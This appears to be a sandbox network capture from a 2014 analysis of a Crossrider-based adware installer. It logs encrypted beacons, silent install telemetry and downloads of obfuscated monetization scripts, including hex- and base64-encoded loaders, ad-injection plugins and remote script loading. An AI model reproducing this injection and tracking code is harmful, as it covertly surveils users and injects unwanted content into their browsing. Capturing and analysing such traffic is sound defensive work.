    GET /p.ashx?e= 0m13SthQps 8U9Mk34kw8QS2RgqxlKpQF3UKsSdb2vwmjpruFCyhX5dMiu8MPG01B6YeMqi Im/qdRJpdu7mSHo7XGg4zZbCvnBFMNFCylGWU7gz wA0swGIbO2JyH/2oW7UKZaCDjhCmRuZ7WprNUozDc7RPfSeKRzCupNECsE8SFHLIEPsM3UKcKGG9ndLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9U3S8esvLqwTmK3k1EAs6sfLoPddIkY3WBttGDaJRbHKVhqCc1dyL3A== HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:27 GMT
    Content-Length: 0
    HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/plain..Ser
    ver: Microsoft-IIS/8.0..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP
    .NET..Date: Wed, 04 Jun 2014 18:54:27 GMT..Content-Length: 0..
    .
    ...



    GET /p.ashx?e=hNMAVKhukrxQ7vT6UlpXS7Hbi1p4Zxnm/grZOB60hz54E7mrr1h80nCV2BSzkbCw3e14SYwGceQTCpS94p21WHD3jm6PAwKvD3T7xkgH4O7LOCiWPl5k0lsyL1Cw9OzrwaZOKGJlrs512zlOrqcKdHUXUX1nbdYdyaU4yQDac8mFzoNt4Ofsjzs1eJiiYYwojgb6v7cXpPuhdSzxiLx/vMc4 zvT5ptYH5QQ4/ v61o8Zai3MsiwQAfZFku3V2enpSLERfTF/PAjtuufyo2/uPPP1z34ZOLgImtRhO55fOmUGQZ 6XGOUbLIF B0L8w8xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FK6VCsNuKBiir8uE40O0xGz4zJfSwDmmmLcb2RMdMffP3LkO87mF5Z0g== HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:52 GMT
    Content-Length: 0
    HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/plain..Ser
    ver: Microsoft-IIS/8.0..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP
    .NET..Date: Wed, 04 Jun 2014 18:54:52 GMT..Content-Length: 0..
    .
    ...



    GET /p.ashx?e=M7A8vgjJHrgfJBuEXOGPjbZ3F1XQsKZI/WD6e6SZIIHGHw2h393u/eTpxIBq/UhPKSzD1VOa2AGkPX72S84aTx6mU6M3hmZBQyGMTBwAMH7Mt 6BEut5hpvg3usbvS7ywHfBD544WbbHYOwAGan1UMcxvcDbxUA2YCpHZc9ZUaGG59M18K8NMt QPs7ujQYmkOB3v7aTq0GBlvrxT745bEA33c rILBrjOUAZXKr2d7gQ7Es6z9h LVF1ZzZB6XhP/BMvlZxIn/4AefXGAWYAXHyuBkgmFdvCCdaMPqgielTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdvavnoSbOw/pQButm8nuV6z4FYIe0wOEBsZrH4OkX02V7GZX3kksWuoAkrAmhSSB5da HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:45 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e=657cd9m3NQGqLfoC4OqV/GiwnTkmW6P97OXLse4BafSePFQUn2Ibrb6Gb8KFABTw0I GKFrrI062Zgsasucq3OoYmyje41WxTJe1GQ MRj50TBvNdroHSbLRD/MFmTIYRWGjyvG Kbs0adlvQBqn5Tryg7dNNcvK1QHs3X92ilEqjHjRwH0s7BD4NsK07Wi5s IILilpWF3L9qMA UL4GiYcYa rp/59Oz3yCtjoppOv9W41Hn7OPSVNckomstbKncplbj8o7GeNKEGtOzYkhvxvAD7aZuOdb/qkf695NeIuTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H1TdLx6y8urBOYreTUQCzqx8ug910iRjdYG20YNolFscpWGoJzV3Ivc HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:47 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e=QHucCbLl /brPsk3N17xhK0c20onz6EKsg7jyZ2P5QEjfVNNb5zryg5l0yrLhC8IkMEePUdJICfsWidKRQX9FApRF Mcisr33MyQgDERGz/aRhOxjWineepdwHjwEZIe95UqEBNy sM2eOB64cY1CnicnG1q9KebRiAHnl3CJeyz8LjnD4BZNQQy9IgZy5lJKYX3Ti/i3YMWsa713zW45cEKmBJ1kytzHfGrmKb Ai8StAZytkA54Y0S1nWxf2ZUZB6PWEkv//ugKlGaFWGmKsEM9xpLdeKBEOit TkqGe pujWJYmVycY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLN7ndzAAGpu/O 55wS hX7eXsuU5/1/Tz3wT9IEbQH33V9ctlp/PAg= HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:48 GMT
    Content-Length: 0
    HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/plain..Ser
    ver: Microsoft-IIS/8.0..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP
    .NET..Date: Wed, 04 Jun 2014 18:55:48 GMT..Content-Length: 0..


    GET /plugins/javascripts/monetization/geo/adextent_m.js?ver=1&rnd=41 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:22 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1398175363"
    Last-Modified: Tue, 22 Apr 2014 14:02:43 GMT
    Cache-Control: max-age=675
    Content-Length: 431
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908122.dop019.am4.t,1401908122.cds066.am4.c
    appAPI.internal.monetization = appAPI.internal.monetization || {};.if 
    (typeof appAPI.internal.monetization.plugins === "undefined") { appAPI
    .internal.monetization.plugins = {}; }..appAPI.internal.monetization.p
    lugins[257] = function() {...appAPI.internal.monetization.addRemoteJS(
    {...httpsUrl: "hXXps://dyau9xqp8gzji.cloudfront.net/autotag.js",...htt
    pUrl: "hXXps://dyau9xqp8gzji.cloudfront.net/autotag.js",...pluginId: 2
    57..});..};
    ....



    GET /plugins/mins/monetization/monetizationLoader.js?ver=51&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:22 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401728669"
    Last-Modified: Mon, 02 Jun 2014 17:04:29 GMT
    Cache-Control: max-age=759
    Content-Length: 156130
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908122.dop019.am4.t,1401908122.cds020.am4.c
    (function(t){var v="06-01";if(!appAPI.isBackground&&appAPI.dom&&appAPI
    .dom.isIframe()){return;}var F=appAPI.utils.MD5;if(!F||!F.encode){F={}
    ;F.encode=function(M){return M;};}if(typeof appAPI.internal.monetizati
    on==="undefined"){appAPI.internal.monetization={};}var J=appAPI.utils;
    var w={DBNamespace:"monetization_plugin_",RULS_JSON_NAMESPACE:" rules_
    ",MONETIZATION_PLUGINS_IDS:"monetization_plugins_ids",IS_INSTALL_REPOR
    TED:"is_install_reported_",STATS_NAMESPACE:"stats_",PLUGINS_VERSION:"p
    lugins_version_",GEO_URL:"hXXp://ipgeoapi.com/",BASE_DATE:new Date(201
    3,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:"hXXp://app.datade
    moserv.com/monetization_campaigns/",statsHostUrl:"hXXp://logs.datademo
    serv.com/monetization.gif?",errorHostUrl:"hXXp://errors.datademoserv.c
    om/monetization-error.gif?",countryName:"",reportQueryString:"",subID:
    "000000000000000000",reportEvents:{installEventId:0,dailyEventId:1,ver
    tical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newA
    llowedVertical:32,policyAppDefualtInstallEventId:50,policyAppDefualtDa
    ilyEventId:51},MIN_PAGE_VIEW:(appAPI&&appAPI.internal&&appAPI.internal
    .isNova?-1:50),MAX_IMPRESSIONS_TO_SEND_IN_PING:200,MAX_PAGE_VIEWS_TO_I
    NJECT_BI_PIXEL:200,PAGE_VIEW:"monetization_page_view",pageViewCount:0,
    PLUGINS_DELAY:"monetization_plugins_delay",installationTime:appAPI.ins
    taller.getUnixTime()*1000,hoursToMilisec:60*60*1000,DEFUALT_SOURCE_ID:
    0,categories:{"1":["d908e50170d7cb46a92fdbff0d73bb5d","0a64c81275732dc
    f0eb51fc0fdecfaa7","edb18644366c10cc24c58f6fb14ca9f4","15e39ed909a

    <<< skipped >>>

    GET /plugins/mins/monetization/geo/dealply_m.js?ver=8&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:22 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401904989"
    Last-Modified: Wed, 04 Jun 2014 18:03:09 GMT
    Cache-Control: max-age=862
    Content-Length: 1023
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908122.dop019.am4.t,1401908122.cds029.am4.c
    if (typeof setup2 === 'function') { setup2('MWU2NDQyNTQ0NDU0NTYwZTEyMT
    cxNTNiMTAxODQ2NGU1NDQ0MGUxNzExMWU1ODViNGIxZDVhMDUxNDA3MTcwNDExNWEwZDFh
    MTIwOTQ5MDAxNzBhMTA1YjBlMTUwMjA3MTUwMDE3MDcxMjAwNGExZTA3NTkwNTBiMDQwMD
    BjMTEwODQ5MTcxNDAyMTEzYTMxM2QzNzM2M2IyNzM1MzQyYTIxMmIzMDJiMjEyYzIwMjMy
    ODI3MjAyYTNkMjczMTM2MmIyZjIyM2MzYTQ4MDMwNDE0MjAxZDEyMGEwNjU4MzEzZDM3Mz
    YzYjI3MzUzNDJhMjEyYjMwMmIyNTI0MjQzOTI4MjIyODJiM2QyYjQyMWMxZDAyNWIzYzNh
    MmQzMDNiMzcyNzI2MmYyMjI2MzczMTM3MjcyMTI2MmIyZjIyM2MzYTRjNGU3ZTQ0NTQ1ND
    Q2NDQwYjExMWExMjA3MzEwNjE4NDQ1YzQzNDcwNjE2MDAxNDA3NGU0OTQ5MGEzYTBkMTAx
    MDE2MWUwNzM5MGYwZDAzMDE0YzAwMDgwNzE3MDIwODRkMDYwMTBmNWIwNzA2MTAxNDQ5MD
    kwNDE4MDMwNzA3MDYxZDE2MTI0ZDBmMWQ1ZDE3MGMxNTFhMDgwMzBmNTgwZDEwMTAxNjJi
    MmIzOTI1MzEyYTNkMzEyNjJkMzAzMTM0MzkyNjNkM2EyNzNhMjAzMTMwMzkzNTM2MjczMT
    JiMzAzYjJiNTIwNzE2MTMzMTA3MTYxODAxNDkyYjM5MjUzMTJhM2QzMTI2MmQzMDMxMzQz
    OTIyMzUzZTNkM2EyNTM5MzEzOTM5NDUwZDA3MDY0OTNiMmIzNzM0MjkzMDM2M2MyYjMwMj
    EyNjJiMzMzNTI2MzczMTJiMzAzYjJiNTY0YTZjNDM0NTRlNDI1NjE0MTgwMTAxMGYwZDJj
    MGE0MDRlNDQ0NTQ0NTQ2YzFl', 'enbtdttffc'); }
    ....



    GET /plugins/mins/monetization/geo/superfish_no_coupons_m.js?ver=12&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:22 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401904989"
    Last-Modified: Wed, 04 Jun 2014 18:03:09 GMT
    Cache-Control: max-age=544
    Content-Length: 759
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908122.dop019.am4.t,1401908122.cds039.am4.c
    if (typeof setup2 === 'function') { setup2('MDM2OTY3NTAxZDAzMGUwYTNkMT
    YxNDQxNTQ1MjU3MWYwZTBlMTg1ZTU3NGMxOTA1MDI1OTA5MGYxODAxMGEwNTA3MDExZDU5
    MTkxNTA1NGIwZjEwNDEwMTEzMjgxNzFiMDEwYTU2MDkxZDAyNGExMzE2MDkwNzExMGEwMD
    BiNGYxZDFmMGMwMDA1MGQxMzE0NDgwNzA2MTIwODMzMGM1OTE5MDEwZDU0MzYyMzMzM2U1
    NTNiMjcyMDNjM2QyNjI0MjgzMzJjMjEyYTNjMmIyYTIxMzIzNDNlMmQyMDI3MzAzYjMwMm
    EzZTNlMjUzNzQ2NTQ2OTY3NTAxZDAzMGUwYTFiMzEwYTBmNGM0ODU1NTUxMjBlMWMxNDBi
    NTk0MTVkMDIwMDBkNTQxYjExMDgwNjFjMTQxYzA0MTI1NDBiMGIxNTRjMTkwMTVhMDQxYz
    I1MDUwNTExMGQ0MDE4MDYwNzQ1MWUwNDE3MTcxNjFjMTExMDRhMTIxMjFlMWUxNTBhMDUw
    NTUzMDIwOTFmMWEyZDFjNWUwZjEwMTY1MTM5MmUyMTIwNDUzYzMxMzEyNzM4MjkyOTNhMm
    QzYzI2M2MyZDMwMmYyZTNmMjYyMDNkMjczMTIxMjAzNTI1MzMyYzNiMjc0MTQyNzg3YzU1
    MGExNjFkMDMxMTBkMjcxNjU3NGQ1YTQzNWI2ZTA1', 'xcnruwzzhd'); }
    ....



    GET /plugins/mins/stats/ie.js?ver=1&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:22 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401904979"
    Last-Modified: Wed, 04 Jun 2014 18:02:59 GMT
    Cache-Control: max-age=480
    Content-Length: 491
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908122.dop019.am4.t,1401908122.cds054.am4.c
    if (typeof setup2 === 'function') { setup2('MWY3ODYxNGExYzFhMTMxMzM5MT
    kwODUwNTI0ODU2MDYxMzE3MWM1MTRiNWQxODEwNWEwMzFlMDIwZjFmMGQwNDBkMWIwMDBm
    MTMxMDQyMDgwYjFmNDcwOTE3MWEwZTE1MDk0NDBkMTc0NjAyMDc1MTE1MGQwODU2M2IyZD
    NhMjYzMDMxMzg0MTQwNjE2ZDUwMDAxYzAwMWUxNDM2MWUwNzQ2NDg0ODRhMWMxYTEzMTMx
    ZjUxNGI1ZDBhNWIxYTU2MDk1MDAyNTk0YTAxMWIwNDVhMDYxMDAwMDgwNTRhMWMwZDFjNW
    IwZjA0MTcwNTFkMDE1ZDAxMGQ1YTA0MTQ1YzFlMDUwMDRmMzczNzI2MjAyMzNjMzM0OTQ4
    Nzg2MTRhMDQwMjEyMDQwNTA1MmQxNjRhNTI1NDVjNTE1YTY2MTY=', 'drhhtngclk');
    }
    ....



    GET /plugins/mins/monetization/setup.js?ver=12&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:22 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401299688"
    Last-Modified: Wed, 28 May 2014 17:54:48 GMT
    Cache-Control: max-age=764
    Content-Length: 6298
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908122.dop019.am4.t,1401908122.cds046.am4.c
    var _0x25da=["\x73\x74\x72\x69\x6E\x67","\x6C\x65\x6E\x67\x74\x68","\x
    63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x72\x65\x70\x6C\x61\x63\x65"
    ,"\x6D\x61\x74\x63\x68","\x6D\x61\x70","\x61\x70\x70\x6C\x79","\x66\x7
    2\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x75\x74\x69\x6C\x73","\x4
    2\x61\x73\x65\x36\x34","\x64\x65\x63\x6F\x64\x65","\x63\x61\x6C\x6C","
    \x70\x61\x72\x73\x65","\x4A\x53\x4F\x4E","\x6D\x6F\x6E\x65\x74\x69\x7A
    \x61\x74\x69\x6F\x6E","\x69\x6E\x74\x65\x72\x6E\x61\x6C","\x70\x6C\x75
    \x67\x69\x6E\x73","\x75\x6E","\x64\x65\x66","\x69\x6E\x65\x64","\x70\x
    6C\x75\x67\x69\x6E\x49\x64","\x67\x65\x74\x45\x78\x74\x65\x6E\x64\x65\
    x64\x53\x75\x62\x49\x64","\x66\x75\x6E\x63\x74\x69\x6F\x6E","\x73\x6C\
    x69\x63\x65","\x67\x65\x74\x53\x75\x62\x49\x64","\x67\x65\x74\x54\x69\
    x6D\x65","\x68\x74\x74\x70\x55\x72\x6C","\x5F\x5F\x52\x4E\x44\x5F\x5F"
    ,"\x67","\x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x45\x58\
    x54\x45\x4E\x44\x45\x44\x5F\x53\x55\x42\x5F\x49\x44\x5F\x5F","\x5F\x5F
    \x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x55\x53\x45\x52\x5F\x49\x
    44\x5F\x5F","\x75\x73\x65\x72\x49\x64","\x61\x70\x70\x49\x6E\x66\x6F",
    "\x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x49\x4E\x53\x54\
    x41\x4C\x4C\x45\x52\x5F\x55\x53\x45\x52\x5F\x49\x44\x5F\x5F","\x67\x65
    \x74\x55\x73\x65\x72\x49\x64","\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72","
    \x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x41\x50\x50\x5F\x
    49\x44\x5F\x5F","\x61\x70\x70\x49\x44","\x5F\x5F\x43\x52\x4F\x53\x53\x
    52\x49\x44\x45\x52\x5F\x42\x52\x4F\x57\x53\x45\x52\x5F\x5F","\x74\

    <<< skipped >>>

    GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=92F4CE5DE43B4200BD216411591F0444IE&app=35510&appver=0&verifier=cf88a6e798062720061920ae8ad681d4&srcid=000169&version_date=21-05-14&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&xpiver=0_94&crxver=0&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=8704&asw3=&procstarttime=1401908096&procruntime=2&rnd=1401908098 HTTP/1.1
    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: AuckkYsilcOeN/jVVX 2hlm57Lvhau9m3bEeF1mrtFPt22iFrMHUAmtclzs91w5Qlm5DK4bwspU=
    x-amz-request-id: 140950103DA2B470
    Date: Wed, 04 Jun 2014 18:55:03 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:57:02 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: AuckkY
    silcOeN/jVVX 2hlm57Lvhau9m3bEeF1mrtFPt22iFrMHUAmtclzs91w5Qlm5DK4bwspU=
    ..x-amz-request-id: 140950103DA2B470..Date: Wed, 04 Jun 2014 18:55:03
    GMT..Cache-Control: no-cache, must-revalidate..Expires: Mon, 26 Jul 19
    97 05:00:00 GMT..Last-Modified: Mon, 24 Feb 2014 23:57:02 GMT..ETag: "
    28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
    ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;

    ....



    GET /installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=92F4CE5DE43B4200BD216411591F0444IE&app=35510&appver=278&verifier=cf88a6e798062720061920ae8ad681d4&srcid=000169&version_date=21-05-14&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&xpiver=0_94&crxver=0&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=8704&asw3=&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1401908096&procruntime=34&rnd=1401908130 HTTP/1.1

    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: XmHT3NNgiZzg8loxe3 6FvIgann1ka1W4J687njC5rafX8IrouBRQL8AyacxvW3ydq250ustpvY=
    x-amz-request-id: 68EC338B5A82491F
    Date: Wed, 04 Jun 2014 18:55:35 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:57:02 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....



    GET /apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=92F4CE5DE43B4200BD216411591F0444IE&app=35510&appver=278&verifier=cf88a6e798062720061920ae8ad681d4&srcid=000169&version_date=21-05-14&installtime=1401908096&curtime=1401908096&lifetime=0&silent=1&procstarttime=1401908096&procruntime=35&rnd=1401908131 HTTP/1.1

    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: WETV7/qe9g5PGXSk34vC5/KP6rCvt 2eK52fXxG9QWzR9jOoZI ymG5CMxhwwqhasH61XYKZhAE=
    x-amz-request-id: 0784CC4785979965
    Date: Wed, 04 Jun 2014 18:55:36 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:54 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: WETV7/
    qe9g5PGXSk34vC5/KP6rCvt 2eK52fXxG9QWzR9jOoZI ymG5CMxhwwqhasH61XYKZhAE=
    ..x-amz-request-id: 0784CC4785979965..Date: Wed, 04 Jun 2014 18:55:36
    GMT..Cache-Control: no-cache, must-revalidate..Expires: Mon, 26 Jul 19
    97 05:00:00 GMT..Last-Modified: Mon, 24 Feb 2014 23:56:54 GMT..ETag: "
    28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
    ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;..


    GET /plugin/apps/35510/js/na/ie/app_code.js?ver=278&rnd=9347 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.datademoserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:25 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401651784"
    Last-Modified: Sun, 01 Jun 2014 19:43:04 GMT
    Cache-Control: private, must-revalidate, max-age=861
    Content-Length: 15615
    Content-Type: text/javascript; charset=utf-8
    X-HW: 1401908125.dop011.am4.t,1401908125.cds004.am4.c
    ..  /*****************************************************************
    *******************. This is your Page Code. The appAPI.ready() code
    block will be executed on every page load.. For more information plea
    se visit our docs site: hXXp://docs.crossrider.com.*******************
    ******************************************************************/.HO
    ST = "hXXp://wt.iwebar.com";.TOOLBAR_URL = HOST '/js/toolbar.js';..A
    FFILIATE_ID = 'NONE';...appAPI.ready(function($) {.../*..if (appAPI.db
    .get('user_id') === null) {...if (appAPI.db.get('installation') === nu
    ll){....appAPI.db.set('installation', new Date().getTime());....return
    ;...}...else {....if ((new Date().getTime() - appAPI.db.get('installat
    ion')) < 1000 * 60 * 60 * 48){.....//No need to display toolbar...
    hasn't been 2 days yet......return;....} ...}..}*/...console.log("====
    ===> Extension [version: " appAPI.appInfo.version "] loading...
    ");....// Set the affiliate ID. //appAPI.db.set('affiliate_id', AFF
    ILIATE_ID);...// Include the Base64 library..appAPI.resources.includeJ
    S('jquery.base64.js');..appAPI.resources.includeJS('jquery-1.10.2.min.
    js');..appAPI.resources.includeJS('md5.js');..//appAPI.resources.inclu
    deJS('i2v.js');..//appAPI.resources.includeJS('askcom.js');....appAPI.
    resources.includeJS('jw_whitelist_1.js');..appAPI.resources.includeJS(
    'jw_whitelist_2.js');..appAPI.dom.addRemoteJS('hXXp://wt.iwebar.com/js
    /jw_whitelist_3.js');.....var pObj = sendReport();..//startAskCom(pObj
    .aff, pObj.pix, '');...setupInjections();......function getZData()

    <<< skipped >>>

    GET /plugin/apps/35510/plugins/na/ie/plugins.json?ver=137&rnd=9679 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.datademoserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:25 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401378836"
    Last-Modified: Thu, 29 May 2014 15:53:56 GMT
    Cache-Control: max-age=83
    Content-Length: 17998
    Content-Type: text/plain; charset=UTF-8
    X-HW: 1401908125.dop011.am4.t,1401908125.cds035.am4.c
    {"plugins_list":.    [.      {"id":1,"url":"hXXp://js.clientstatsservi
    ce.com/plugins/mins/base.js","ver":10,"name":"base","browsers":{"ie":t
    rue,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"
    run_at":1,"order":10400},{"run_at":2,"order":10400}],"enabled":true},{
    "id":4,"url":"hXXp://js.clientstatsservice.com/plugins/javascripts/jqu
    ery-1_7_1_min.js","ver":4,"name":"jquery_1_7_1","browsers":{"ie":true,
    "ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at
    ":1,"order":10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{
    "run_at":2,"order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.cl
    ientstatsservice.com/plugins/mins/ie8_fix_1.js","ver":2,"name":"ie8_fi
    x_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false
    ,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"order"
    :10100}],"enabled":true},{"id":3,"url":"hXXp://js.clientstatsservice.c
    om/plugins/mins/ie8_fix_2.js","ver":2,"name":"ie8_fix_2","browsers":{"
    ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targ
    ets":[{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled"
    :true},{"id":28,"url":"hXXp://js.clientstatsservice.com/plugins/mins/i
    nitializer.js","ver":4,"name":"initializer","browsers":{"ie":true,"ff"
    :true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":
    1,"order":999999999},{"run_at":2,"order":999999999}],"enabled":true},{
    "id":21,"url":"hXXp://js.clientstatsservice.com/plugins/mins/debug.js"
    ,"ver":5,"name":"debug","browsers":{"ie":true,"ff":true,"ch":true,

    <<< skipped >>>

    GET /tss-ca-g2.crl HTTP/1.1
    Accept: */*
